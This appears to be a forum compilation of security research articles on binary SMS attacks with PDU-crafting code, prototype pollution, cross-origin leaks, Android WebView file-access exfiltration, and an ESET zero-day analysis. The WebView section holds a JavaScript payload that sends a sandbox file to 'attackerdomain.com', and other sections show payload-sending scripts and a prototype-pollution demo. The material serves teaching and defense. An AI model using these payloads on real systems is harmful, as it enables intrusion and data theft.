Only SMS (Uplink / Downlink): gsm_a.dtap.msg_sms_type == 0x01
Only SMS from originator 12345: gsm_sms.tp-oa == "12345"
Only SMS ack from subscriber: gsm_a.rp.msg_type == 0x02

To send a PDU with YateBTS you can either use the dedicated script in the web interface at /nib_web/custom_sms.php or the more flexible telnet interface on TCP port 5038. Both methods require the IMSI of the recipient, which you can find from the registered subscribers list or by monitoring handset registration and paging on the air interface. We wrapped the telnet interface with our own PHP script using the socket API like so:

// PHP
$cmd = "control custom_sms called=$imsi $type=rpdu";
$socket = fsockopen("localhost", "5038", $errno, $errstr);
fputs($socket, "$cmd\r\n");

With our SMS web API we were not only able to let other researchers on the LAN send PDUs, but also to de-skill the knowledge required to perform SMS testing. The PDU sent on the air interface looks different from the PDU sent over the public network because of differences between the SMS-DELIVER (BTS > MS) and SMS-SUBMIT (MS > BTS) formats. To learn more about PDUs see the PDU section.

Public SMS test environment

PDU testing doesn't have to be expensive. You can send custom PDUs using any GSM device on which you can issue AT modem commands. A practical solution is a 3G dongle such as the Huawei E3533, or even a basic development board such as the Adafruit FONA series.
Using the £20 Huawei E3533 as an example, you will need to ensure the device is connected in GSM modem mode, not Ethernet adapter or mass storage etc. To do this with Linux, issue a usb_modeswitch command as follows:

usb_modeswitch -v 0x12d1 -p 0x1f01 -V 0x12d1 -P 0x14db -M "55534243123456780000000000000011063000000100010000000000000000"

More device-specific commands are available in the forum at http://www.draisberghof.de/usb_modeswitch/bb/

Once you have a /dev/ttyUSBx, connect to it with a serial console like minicom and issue the following Hayes AT commands:

AT+CMGF=0 to place the modem into PDU mode.
AT+CMGS=n to prepare to send a PDU of length n bytes, followed by the PDU itself in hexadecimal form. To obtain the length, take the total number of hexadecimal characters, divide it by 2 to get bytes, then subtract 8 bytes for the recipient's number.

Tip: Hit Ctrl-Z to send the PDU. Do not hit enter.

The serial commands are easily scripted using Python's serial library. Before firing up your Python interpreter, bear in mind your carrier's terms and conditions regarding automated sending of SMS messages. So long as you are in control of each message's transmission you should be OK. Here's a basic Python client for sending a PDU via a GSM modem:

# Python
import serial
import time

ser = serial.Serial(tty, 115200, timeout=5)
ser.write('AT\r')
if "OK" in ser.read(64):
    print "CONNECTED TO MODEM OK"
    ser.write("AT+CMGF=0\r")                      # PDU mode
    ser.write("AT+CMGS=%d\r" % ((len(pdu)/2)-8))  # announce the PDU length
    time.sleep(1)
    ser.write('%s\x1a' % pdu)                     # Ctrl-Z (0x1a) sends the PDU
    print ser.read(64)
else:
    print "MODEM FAILURE"
ser.close()

Protocol Data Units (PDUs)

The GSM 03.40 standard describes Transfer Protocol Data Units (TPDUs), which are used to convey an SMS. The TPDU is used throughout the message's journey across the telecoms network. There are different types of SMS PDUs.
PDUs from the handset to the network are SMS-SUBMIT and could start with byte 0x01; PDUs from the network down to the handset are SMS-DELIVER and could start with byte 0x00, and are normally longer due to the addition of a 7-octet service centre time stamp. The first byte is a bitmask of multiple flags and contains a lot of information.

PDU encoding is complicated, but thankfully there are many free online encoders and programming libraries, like Python's smspdu, to validate your PDU against the GSM 03.40 standard. Before jumping straight in and using one, it's important you understand some key fields and the significant difference between DELIVER and SUBMIT PDUs, as many online decoders only handle SUBMIT and not DELIVER. We've tested lots and recommend Python's smspdu library.

Example validation of a PDU: python -m smspdu [PDU]

The Protocol Identifier (PID) field refers to the application layer protocol used. The default value 0x00 is used for plain short messages. Setting the PID to 0x40 would create a silent SMS, known as a 'type 0' SMS, which all handsets receive and must acknowledge without indicating its receipt to the user. As previously mentioned, this has been used by law enforcement to actively 'ping' a handset on a network.

User data headers and concatenation

When you want to target an application on a phone you need to define the destination port within the User Data Header (UDH), which sits between the PDU header and the User Data (UD) and is declared early on with the User Data Header Indicator (UDHI) flag in the first octet. The UDH is also where Concatenated SMS (C-SMS) fragments are described. SMS allows for large (binary) payloads to be chunked up and sent as separate messages, not necessarily in sequence. This allows for up to 35,700 bytes of custom data (255 texts of 140 octets each, less the UDH overhead in each fragment) to be sent to an application on a handset (warning: you get billed per SMS). To chunk up a large message, it must first be split up into user data fragments of not more than 140 octets each.
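To make the encodings described above concrete, here is a rough JavaScript sketch of the main building blocks: reversed-nibble address encoding, GSM 7-bit packing, a port-addressing/concatenation UDH, and a minimal SMS-SUBMIT PDU. The function names are my own and this is a simplified illustration of the GSM 03.40 structures, not a complete encoder (no extended characters, no septet re-alignment when a UDH is present).

```javascript
// Recipient address digits in reversed-nibble ("semi-octet") BCD.
function encodeMsisdn(digits) {
  if (digits.length % 2) digits += 'F';            // pad odd-length numbers
  let out = '';
  for (let i = 0; i < digits.length; i += 2) out += digits[i + 1] + digits[i];
  return out;
}

// Pack ASCII-compatible characters into GSM 03.38 7-bit septets.
function packGsm7(text) {
  const out = [];
  let carry = 0, bits = 0;
  for (const c of text) {
    carry |= (c.charCodeAt(0) & 0x7f) << bits;     // append one 7-bit septet
    bits += 7;
    while (bits >= 8) {                            // flush completed octets
      out.push(carry & 0xff);
      carry >>= 8;
      bits -= 8;
    }
  }
  if (bits) out.push(carry & 0xff);                // trailing bits, zero-padded
  return out.map(b => b.toString(16).padStart(2, '0')).join('');
}

// UDH combining 16-bit application port addressing (IEI 0x05) with
// 8-bit-reference concatenation (IEI 0x00).
function buildUdh(dstPort, srcPort, ref, total, seq) {
  const ies = [0x05, 0x04, dstPort >> 8, dstPort & 0xff,
               srcPort >> 8, srcPort & 0xff,
               0x00, 0x03, ref, total, seq];
  return [ies.length, ...ies]                      // UDHL prefix
    .map(b => b.toString(16).padStart(2, '0')).join('');
}

// Minimal SMS-SUBMIT TPDU: first octet 0x01, message reference 0x00,
// international recipient (type-of-address 0x91), PID/DCS 0x00, no UDH.
function buildSubmitPdu(msisdn, text) {
  return '0100' +
    msisdn.length.toString(16).padStart(2, '0') +  // address length in digits
    '91' + encodeMsisdn(msisdn) +
    '0000' +                                       // PID 0x00, DCS 0x00
    text.length.toString(16).padStart(2, '0') +    // user data length in septets
    packGsm7(text);
}

console.log(buildSubmitPdu('441234567890', 'Hello World!'));
// 01000c9144214365870900000cc8329bfd065ddf72363904
console.log(buildUdh(2948, 0x5732, 0xff, 2, 1));
// 0b05040b8457320003ff0201
```

The two printed strings reproduce, byte for byte (hex lowercased), the worked "Hello World!" SMS-SUBMIT and the WAP-push UDH used in this article's port-2948 example.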
A concatenated fragment is indicated via the UDHI flag in the first byte, which signals that the first few bytes of the UD are fragment information used to reassemble the fragments in order later. Each fragment is sent preceded by the SMSC header, destination number, and the Protocol Identifier (PID) and Data Coding Scheme (DCS) bytes. The fragment header contains a unique byte which serves as a batch identifier for all the fragments, the total number of fragments, and this fragment's sequence number.

Example UDH declaring 16-bit port addressing AND concatenation: 0B05040B8457320003FF0201

0B: UDH length, excluding the length field itself: 11
05: 16-bit application port addressing information element
04: Information Element length: 4 (the next four octets)
0B84: Destination port: 2948 (WAP push)
5732: Source port: 22322
00: Concatenated SMS information element
03: Information Element length for the C-SMS section: 3
FF: Unique message identifier: 255
02: Fragments total: 2
01: This fragment: 1

For more UDH options see the 3GPP 23.040 standard.

Hello World! SMS-SUBMIT PDU

This PDU to MSISDN +441234567890 has the 'immediate display' flag set, so will pop up as a flash SMS on the recipient's handset:

01000C9144214365870900000CC8329BFD065DDF72363904

Bear in mind that data encoding varies between sections. Some sections are special bitmasks, some are GSM 7-bit encoded and some are just plain old hexadecimal.

01: First octet (bitmask): message type SMS-SUBMIT (bits 0-1)
00: Message Reference: 0
0C: Recipient address length: 12 digits (0x0C)
91: International ISDN/telephone numbering plan (bitmask)
442143658709: Recipient MSISDN +441234567890 (reversed-nibble BCD)
0000: Protocol Identifier: 0 (plain old SMS), Data Coding Scheme: 0 (bitmask)
0C: User data length: 12 septets
C8329BFD065DDF72363904: User data: Hello World! (GSM 7-bit encoding)

GSM interfaces on phones don't have firewalls

With an Android phone you would see the following activity in the log when an SMS PDU is received.
This shows the Radio Interface Layer (RIL) notifying the telephony framework of an incoming unsolicited PDU of length 168 (21 bytes). The full PDU is written to a SQLite database, an automatic acknowledgement (SMS-DELIVER-ACK) is sent back to the network, and finally the PDU is delivered to Android's privileged SMS receiver for onward processing; in this case to the message store, although it could be routed to a listening application if a destination port is specified in the UDH. The only check is within the SmsHandler(), which checks whether SMS messages are allowed. There is no concept of packet inspection or port filters like an IP firewall.

adb logcat -b radio

I/RILC ( 2139): RIL_SOCKET_1 UNSOLICITED: UNSOL_RESPONSE_NEW_SMS length:168
D/RILJ ( 2988): [UNSL]< UNSOL_RESPONSE_NEW_SMS [SUB0]
D/GsmInboundSmsHandler( 2988): IdleState.processMessage:1
D/GsmInboundSmsHandler( 2988): Idle state processing message type 1
D/GsmInboundSmsHandler( 2988): acquired wakelock, leaving Idle state
D/GsmInboundSmsHandler( 2988): entering Delivering state
D/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:1
D/GsmInboundSmsHandler( 2988): isSMSBlocked=false
D/GsmInboundSmsHandler( 2988): URI of new row -> content://raw/1
D/RILJ ( 2988): [9382]> SMS_ACKNOWLEDGE true 0 [SUB0]
D/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:2
D/RILC ( 2139): SOCKET RIL_SOCKET_1 REQUEST: SMS_ACKNOWLEDGE length:20
D/GsmInboundSmsHandler( 2988): Delivering SMS to: com.android.mms com.android.mms.transaction.PrivilegedSmsReceiver

Targeting port 2948 with random data

In this example, an SMS-SUBMIT containing 1000 characters of malformed WBXML has been concatenated as 7 fragments and targeted at the WAP push application listening on port 2948. Because of the port number, an assumption about the data type of the payload is made (WBXML). This could be any binary data addressed to any port.
PDU bytes:

41000C9144214365870900009B0B05040B8457320003FF0201C2E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E17018

41: First octet (bitmask): message type SMS-SUBMIT (bits 0-1), User Data Header Indicator flag set (bit 6)
00: Message Reference: 0
0C: Recipient address length: 12 digits (0x0C)
91: International ISDN/telephone numbering plan (bitmask)
442143658709: Recipient MSISDN +441234567890 (reversed-nibble BCD)
0000: PID: 0, DCS: 0
9B: User data length (including UDH): 155
0B05040B8457320003FF0201: User Data Header (UDH):
Length: 0x0B
16-bit port addressing: 0x05
Four octets long: 0x04
Destination port: 0x0B84
Source port: 0x5732
Concatenated SMS: 0x00
Three octets long: 0x03
Sequence identifier: 0xFF
Total fragments: 0x02
This fragment: 0x01
C2E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E17018: User data: malformed WBXML composed of a repeated sequence of the letter 'a'.

Conclusion

SMS is a weak link in a handset's security. With it you can interact, remotely, with an application on someone's phone even when the phone is not connected to the internet. Significantly, it has no firewall, so bad packets are always forwarded. Despite being an old specification it has received much less scrutiny than, for example, Internet Protocol, and many applications (and now many non-conventional devices) handle SMS PDUs with a greater level of trust than they afford IP packets. In our next SMS blog we'll employ these concepts to attack the application layer on a phone remotely...

Contact and Follow-up

Alex is a senior researcher based in Context's Cheltenham office.
He has over 15 years' experience of engineering and analysing RF systems and protocols and specialises in electronic warfare and RF propagation. See the contact page for how to get in touch. Sursa: https://www.contextis.com/blog/binary-sms-the-old-backdoor-to-your-new-thing
-
HOW TO DETERMINE THE LOCATION OF A MOBILE SUBSCRIBER

Sergey Puzankov

In mobile networks, rather specific attacks are possible. In this article, I will consider a real-time attack that allows one to detect the cell where a subscriber is located. I cannot specify the method's accuracy in more common units of measurement, because cell coverage areas vary greatly with the terrain. In a densely built-up urban area, a cell could cover several hundred meters; on an intercity highway in the wild, however, a cell might cover several kilometers.

Download: https://www.ptsecurity.com/upload/iblock/8c0/8c065c70984c93d3001234ed6e6d865b.pdf
-
Prototype pollution attack

Abstract

Prototype pollution is a term that was coined many years ago in the JavaScript community to designate libraries that added extension methods to the prototype of base objects like "Object", "String" or "Function". This was very rapidly considered a bad practice, as it introduced unexpected behavior in applications. In this presentation, we will analyze the problem of prototype pollution from a different angle. What if an attacker could pollute the prototype of the base object with his own value? What APIs allow such pollution? What can be done with it?

Paper

Link to paper

Slides

Link to slides

Sursa: https://github.com/HoLyVieR/prototype-pollution-nsec18
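The abstract's question ("What if an attacker could pollute the prototype of the base object?") is easiest to see with the classic vulnerable sink: a recursive merge of attacker-controlled JSON. The following is my own minimal illustration of the bug class, not code from the linked paper or slides:

```javascript
// A deliberately naive recursive merge -- a typical vulnerable sink.
function merge(dst, src) {
  for (const key of Object.keys(src)) {
    if (src[key] !== null && typeof src[key] === 'object' &&
        dst[key] !== null && typeof dst[key] === 'object') {
      merge(dst[key], src[key]);              // recurse into nested objects
    } else {
      dst[key] = src[key];
    }
  }
  return dst;
}

// JSON.parse creates "__proto__" as an ordinary own key, so Object.keys sees it...
const attackerInput = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, attackerInput);

// ...but reading dst["__proto__"] walks up to Object.prototype, so the nested
// assignment lands there: every object in the runtime now inherits isAdmin.
console.log({}.isAdmin); // true
```

Any merge-, extend- or clone-style API that copies keys recursively without filtering `__proto__` (or `constructor` / `prototype`) is a candidate sink of this kind.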
-
How do we Stop Spilling the Beans Across Origins?

A primer on web attacks via cross-origin information leaks and speculative execution
aaj@gxxgle.com, mkwst@gxxgle.com

Intro

Browsers do their best to enforce a hard security boundary on an origin-by-origin basis. To vastly oversimplify, applications hosted at distinct origins must not be able to read each other's data or take action on each other's behalf in the absence of explicit cooperation. Generally speaking, browsers have done a reasonably good job at this; bugs crop up from time to time, but they're well understood to be bugs by browser vendors and developers, and they're addressed promptly.

The web platform, however, is designed to encourage both cross-origin communication and inclusion. These design decisions weaken the borders that browsers place around origins, creating opportunities for side-channel attacks (pixel perfect, resource timing, etc.) and server-side confusion about the provenance of requests (CSRF, cross-site search). Spectre and related attacks based on speculative execution make the problem worse by allowing attackers to read more memory than they're supposed to, which may contain sensitive cross-origin responses fetched by documents in the same process. Spectre is a powerful attack technique, but it should be seen as a (large) iterative improvement over the platform's existing side-channels.

This document reviews the known classes of cross-origin information leakage, and uses this categorization to evaluate some of the mitigations that have recently been proposed (CORB, From-Origin, Sec-Metadata/Sec-Site, SameSite cookies and Cross-Origin-Isolate). We attempt to survey their applicability to each class of attack, and to evaluate developers' ability to deploy them properly in real-world applications. Ideally, we'll be able to settle on mitigation techniques which are both widely deployable and broadly scoped.

Sursa: https://www.arturjanc.com/cross-origin-infoleaks.pdf
-
May 15, 2018

Reviewing Android WebViews fileAccess attack vectors

Introduction

WebViews are a crucial part of many mobile applications and there are some security aspects that need to be taken into account when using them. File access is one of those aspects. While implementing some checks in our security tool Droidstatx, I spent some time understanding all the details and noticed that not all attack vectors are very clear, especially in their requirements.

WebView file access is enabled by default. Since API 3 (Cupcake 1.5) the method setAllowFileAccess() has been available for explicitly enabling or disabling it. A WebView with file access enabled will be able to access all the same files as the embedding application, such as the application sandbox (located in /data/data/<package_name>), /etc, /sdcard, among others. Above API 19 (KitKat 4.4 - 4.4.4), the app will also need the android.permission.READ_EXTERNAL_STORAGE permission. The WebView needs to use a file URL scheme, e.g. file://path/file, to access the file. Another important detail is that WebViews have JavaScript disabled by default; the method setJavaScriptEnabled() is available for explicitly enabling or disabling it.

Before going into details regarding the attack vectors that are made possible with file access, one needs to be aware of another concept, the Same Origin Policy (SOP):

A web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, host name, and port number.
in https://en.wikipedia.org/wiki/Same-origin_policy

As an example, the URLs https://www.integrity.pt and file://etc/hosts do not have the same origin, since they won't match in:

Scheme: https vs file
Authority: www.integrity.pt vs etc/hosts

This means that a file request made in the context of content loaded from https://www.integrity.pt will be considered a Cross Origin Request (COR).

Attack Vectors

So we have a WebView with file access. Now what? As attackers we want data exfiltration, and this is what motivated me to write this article, because there are details that can invalidate this type of attack.

Scenario 1: App with a WebView that loads resources which the attacker is able to intercept and manipulate. JavaScript enabled.

In this scenario, an attacker is able to intercept the communication of the app and manipulate the content. Our goal is to exfiltrate content from the app, so our best option is to use JavaScript, and an XMLHttpRequest seems the best way to do that. The attacker can try to replace the content returned to the app with a JavaScript payload that would seemingly allow file exfiltration:

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        window.location.replace('https://attackerdomain.com/?exfiltrated=' + xhr.responseText);
    }
}
xhr.open('GET', 'file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt', true);
xhr.send(null);

The attacker will be able to see the HTTP request, but without exfiltrated data. If we look into the system logs we discover why.
05-09 12:38:59.306 27768 27768 I chromium: [INFO:CONSOLE(20)] "Failed to load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt: Cross origin requests are only supported for protocol schemes: http, data, chrome, https.", source: https://labs.integrity.pt/ (20)

On earlier API versions like 15 (Ice Cream Sandwich 4.0.3 - 4.0.4) a similar error is returned:

Console: XMLHttpRequest cannot load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt. Cross origin requests are only supported for HTTP. null:1
Console: Uncaught Error: NETWORK_ERR: XMLHttpRequest Exception 101 https://labs.integrity.pt/:39

So even with file access enabled in the WebView, the attacker will not be able to exfiltrate files this way, because the file scheme request is considered a Cross Origin Request and hence disallowed.

Scenario 2: App with a WebView that loads local HTML files via the file scheme, with external resources which the attacker is able to intercept and manipulate. JavaScript enabled.

In this scenario, the HTML files are stored locally in the APK and are loaded via the file scheme, but some resources are loaded externally. There is a very important property called UniversalAccessFromFileURLs that allows an SOP bypass. This property indicates whether JavaScript running in the context of a file scheme can access content from any origin. It is enabled by default below API 16 (Jelly Bean 4.1.x), and there is no way to disable it on those API levels [1]. In API 16 (Jelly Bean 4.1.x) and later the property is disabled by default, and the method setAllowUniversalAccessFromFileURLs() was made available to explicitly enable or disable it.

Using the same JavaScript payload, the attack will succeed on devices running API 15 and below, or in apps that explicitly enable the property using the method setAllowUniversalAccessFromFileURLs().
The attack succeeds because the app is running JavaScript in the context of an HTML file loaded with a file scheme and the UniversalAccessFromFileURLs property is enabled, allowing an SOP bypass.

Scenario 3: App with an exported component that opens URLs via Intent. Backup disabled. Access to external storage.

In this scenario, the app has an exported activity that receives URLs via Intents and opens the respective URL. This is very common in apps that use deep links. When intent-filters are not correctly implemented, this can cause security issues. The app also has backup disabled, preventing an attacker from obtaining access to the app's sandbox content via the backup file. Here the attack vectors are a bit trickier and far-fetched, but still possible.

Scenario 3 - Physical Attack

One possible attack vector is someone who has physical access to an unlocked device, already knows the structure of the vulnerable app in advance (consider a hypothetical well-known app with a large user base), and session cookies or plaintext credentials are stored in the app's sandbox. The attacker can install a custom app that sends a targeted Intent for the file with sensitive information, or install a terminal emulator from Google Play and type in the following command:

am start -n pt.integrity.labs.webview_intents/.ExportedActivity --es url "file:///data/data/pt.integrity.labs.webview_intents/files/sandbox_file.txt"

This will trigger the vulnerable app and the WebView will show the content of the sensitive file on the screen. Without rooting the device it is possible to obtain access to the content of the app's sandbox.

Scenario 3 - Malicious App

This attack requires that the vulnerable app is running on a device below API 16, or that the app has explicitly enabled UniversalAccessFromFileURLs. An attacker lures the user into installing a malicious app that only needs the android.permission.INTERNET and android.permission.READ_EXTERNAL_STORAGE permissions.
When started, the malicious app creates an HTML file in the external storage with a JavaScript payload identical to the one used in scenarios 1 and 2. Afterwards, it sends an Intent to the vulnerable app containing the URL of the local HTML file (previously created in the external storage). This allows it to exfiltrate information from inside the vulnerable app's sandbox, as in scenario 2.

Test Apps

I've created apps for all scenarios so you can play around and test this for yourselves.

Scenario 1 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_remote_scenario1.apk
Scenario 2 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_local_scenario2.apk
Scenario 3 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3.apk
Scenario 3 Exploit App - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3_exploit.apk

Note 1: All apps have a broken TLS implementation so it's easier to intercept the communication. If using Burp Suite, for scenario 2, ensure that you adjust the Intercept Client Requests rules so that you can intercept JavaScript content.
Note 2: While exploring the vulnerability in scenarios 2 and 3 (both the vulnerable app and the exploit) you will need to clear the data (Settings->Apps->App->Clear Data) when trying to repeat the attack.
Note 3: For the scenario 3 malicious app, start the vulnerable app a first time and only then run the exploit app.

Conclusion

WebViews with file access enabled can have a big impact on a particular application's security but, by itself, a WebView with file access enabled does not guarantee a practical way to exfiltrate files from the system. For the attack to work it is required that the app is running on a device with API level < 16 and/or the app developer improperly used the Android platform, as demonstrated in some of the scenarios above.
These were the attack vectors that I could identify, but if I missed one I would love to discuss it and add it here. Ping me at https://twitter.com/clviper.

Recommendations:

Ensure that all external resources loaded by a WebView use TLS and that the app has a correct TLS implementation.
Ensure that all exported components that might receive Intents and trigger a WebView to open a URL correctly filter the allowed URIs, by using intent-filters with a data element.
Ensure that all WebViews explicitly disable file access when it is not a requirement, by using the method setAllowFileAccess().
On API level >= 16, when not a requirement, ensure that no WebView enables UniversalAccessFromFileURLs via the method setAllowUniversalAccessFromFileURLs().

References

https://en.wikipedia.org/wiki/Same-origin_policy
https://source.android.com/setup/start/build-numbers
https://developer.android.com/reference/android/webkit/WebView
https://developer.android.com/reference/android/webkit/WebSettings
https://developer.android.com/guide/components/intents-filters
https://developer.android.com/guide/topics/manifest/data-element
https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#testing-webview-protocol-handlers

Notes

[1] Currently the Android developer documentation has the following paragraph: "To prevent possible violation of same domain policy when targeting ICE_CREAM_SANDWICH_MR1 and earlier, you should explicitly set this value to false." I've opened an issue on the Google issue tracker, since this paragraph needs to be adjusted: the public method setAllowUniversalAccessFromFileURLs() was only introduced in API 16, so it is not possible to use this method on API 15 (ICE_CREAM_SANDWICH_MR1) and earlier.

Thank you

Special thank you to pmsac and morisson for the post review.
Written by Cláudio André Sursa: https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/
-
A tale of two zero-days

Double zero-day vulnerabilities fused into one: a mysterious sample enables attackers to execute arbitrary code with the highest privileges on intended targets.

Anton Cherepanov, 15 May 2018 - 02:58PM

Late in March 2018, ESET researchers identified an interesting malicious PDF sample. A closer look revealed that the sample exploits two previously unknown vulnerabilities: a remote-code execution vulnerability in Adobe Reader and a privilege escalation vulnerability in Microsoft Windows.

The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.

Once the PDF sample was discovered, ESET contacted and worked together with the Microsoft Security Response Center, the Windows Defender ATP research team, and the Adobe Product Security Incident Response Team as they fixed these bugs.
Patches and advisories from Adobe and Microsoft are available here: APSB18-09, CVE-2018-8120.

The affected product versions are the following:

Acrobat DC (2018.011.20038 and earlier versions)
Acrobat Reader DC (2018.011.20038 and earlier versions)
Acrobat 2017 (011.30079 and earlier versions)
Acrobat Reader DC 2017 (2017.011.30079 and earlier versions)
Acrobat DC (Classic 2015) (2015.006.30417 and earlier versions)
Acrobat Reader DC (Classic 2015) (2015.006.30417 and earlier versions)
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1

This blog covers technical details of the malicious sample and the vulnerabilities it exploited.

Introduction

PDF (Portable Document Format) is a file format for electronic documents and, as with other popular document formats, it can be used by attackers to deliver malware to a victim's computer. In order to execute their own malicious code, attackers have to find and exploit vulnerabilities in PDF viewer software. There are several PDF viewers; one very popular viewer is Adobe Reader.

The Adobe Reader software implements a security feature called a sandbox, also known in the viewer as Protected Mode. A detailed technical description of the sandbox implementation was published on Adobe's blog in four parts (Part 1, Part 2, Part 3, Part 4). The sandbox makes the exploitation process harder: even if code execution is achieved, the attacker still has to bypass the sandbox's protections in order to compromise the computer running Adobe Reader. Usually, a sandbox bypass is achieved by exploiting a vulnerability in the operating system itself.
This is a rare case in which the attackers were able to find vulnerabilities and write exploits for both the Adobe Reader software and the operating system.

CVE-2018-4990 - RCE in Adobe Reader

The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed. At the beginning of exploitation, the JavaScript code starts to manipulate the Button1 object. This object contains a specially crafted JPEG2000 image, which triggers a double-free vulnerability in Adobe Reader.

Figure 1. JavaScript code that manipulates the Button1 object

The JavaScript uses heap-spray techniques in order to corrupt internal data structures. After all these manipulations the attackers achieve their main goal: read and write access to memory from their JavaScript code.

Figure 2. JavaScript code used for reading and writing memory

Using these two primitives, the attacker locates the memory address of the EScript.api plugin, which is the Adobe JavaScript engine. Using assembly instructions (ROP gadgets) from that module, the malicious JavaScript sets up a ROP chain leading to the execution of native shellcode.

Figure 3. Malicious JavaScript that builds a ROP chain

As the final step, the shellcode initializes a PE file embedded in the PDF and passes execution to it.

CVE-2018-8120 - Privilege escalation in Microsoft Windows

After exploiting the Adobe Reader vulnerability, the attacker has to break out of the sandbox. This is exactly the purpose of the second exploit discussed here. The root cause of this previously unknown vulnerability is located in the NtUserSetImeInfoEx function of the win32k Windows kernel component. Specifically, the SetImeInfoEx subroutine of NtUserSetImeInfoEx does not validate a data pointer, allowing a NULL pointer dereference.

Figure 4. Disassembled SetImeInfoEx routine

As is evident in Figure 4, the SetImeInfoEx function expects a pointer to an initialized WINDOWSTATION object as its first argument. The spklList field could be equal to zero if the attacker creates a new window station object and assigns it to the current process in user mode. Thus, by mapping the NULL page and setting a pointer at offset 0x2C, the attacker can leverage this vulnerability to write to an arbitrary address in kernel space. It should be noted that since Windows 8, a user process is not allowed to map the NULL page.

Since the attacker has an arbitrary-write primitive, they could use different techniques, but in this case they chose a technique described by Ivanlef0u, and by Mateusz "j00ru" Jurczyk and Gynvael Coldwind. The attacker sets up a call gate to Ring 0 by rewriting the Global Descriptor Table (GDT). To do so, the attacker obtains the address of the original GDT using the SGDT assembly instruction, constructs their own table, and then rewrites the original one using the above-mentioned vulnerability. The exploit then uses the CALL FAR instruction to perform an inter-privilege-level call.

Figure 5. The disassembled CALL FAR instruction

Once the code is executed in kernel mode, the exploit replaces the token of the current process with the system token.

Conclusion

Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages. Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skill in vulnerability discovery and exploit writing.
Indicators of Compromise (IoC)

ESET detection names:
JS/Exploit.Pdfka.QNV trojan
Win32/Exploit.CVE-2018-8120.A trojan

SHA-1 hashes:
C82CFEAD292EECA601D3CF82C8C5340CB579D1C6
0D3F335CCCA4575593054446F5F219EBA6CD93FE

Anton Cherepanov
15 May 2018 - 02:58PM

Sursa: https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/
-
Binary Exploitation

Any doubt...? Let's discuss!

Introduction

I am quite passionate about exploiting binary files. The first time I came across a buffer overflow (a simple exploitation technique), I was not able to reproduce it with the same copy of code on my own system. The reason was that there was no consolidated document to guide me thoroughly through writing a working exploit payload for a program when the underlying system changes. There are also very few descriptive blogs/tutorials that helped me exploit a given binary. So I have put together a consolidation of modern exploitation techniques (in the form of a tutorial) that will allow you to understand exploitation from scratch.

I will be using a Vagrant file to set up the system on VirtualBox. To do the same on your system, run:

vagrant up
vagrant ssh

Topics

Lecture 1.
Memory layout of a C program. ELF binaries. Overview of the stack during a function call. Assembly code for the function call and return. Concept of $ebp and $esp. Executable memory.

Lecture 1.5.
How does Linux find binary utilities? A simple exploit using the Linux $PATH variable.

Lecture 2.
What are stack overflows? ASLR (basics), avoiding stack protection. Shellcodes. Buffer overflow: changing control flow of the program to return to some other function. Shellcode injection into a buffer and spawning a shell.

Lecture 3.
Shellcode injection with ASLR enabled. Environment variables.

Lecture 3.5.
Return-to-libc attacks. Spawning a shell with a non-executable stack. Stack organization in a ret2libc attack.

Lecture 4.
This folder contains a set of questions for exploiting binaries using the concepts we have learned so far.

Lecture 5.
What is a format string vulnerability? Seeing the contents of the stack. Writing onto the stack. Writing to an arbitrary memory location.

Lecture 6.
GOT. Overriding a GOT entry. Spawning a shell with a format string vulnerability.

Sursa: https://github.com/r0hi7/BinExp
-
-
-